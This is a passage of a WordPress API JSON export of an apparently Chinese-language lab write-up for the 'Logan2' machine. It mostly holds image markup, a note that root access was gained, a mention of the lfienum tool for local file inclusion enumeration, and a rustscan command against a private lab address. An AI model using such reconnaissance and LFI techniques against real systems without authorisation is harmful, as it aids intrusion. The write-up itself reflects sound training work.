src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241795.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628223112786\" \/><\/div><\/p>\n<p>\u5f97\u5230root\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241796.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406282241796.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240628223145133\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u5176\u4ed6\u6536\u83b7<\/h2>\n<p>\u53d1\u73b0\u4e86\u4e00\u4e2a\u65b0\u5de5\u5177<code>lfienum<\/code>\uff0c\u53ef\u4ee5\u5f88\u65b9\u4fbf\u7684\u6d4b\u8bd5lfi\u5305\u542b\u4e86\u54ea\u4e9b\u6587\u4ef6\uff0c\u800c\u4e0d\u5fc5\u624b\u52a8\u6d4b\u8bd5\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Logan2 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.145 &#8212; -A Open 1 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-701","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=701"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions"}],"predecessor-version":[{"id":703,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/701\/revisions\/703"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=701"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=701"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}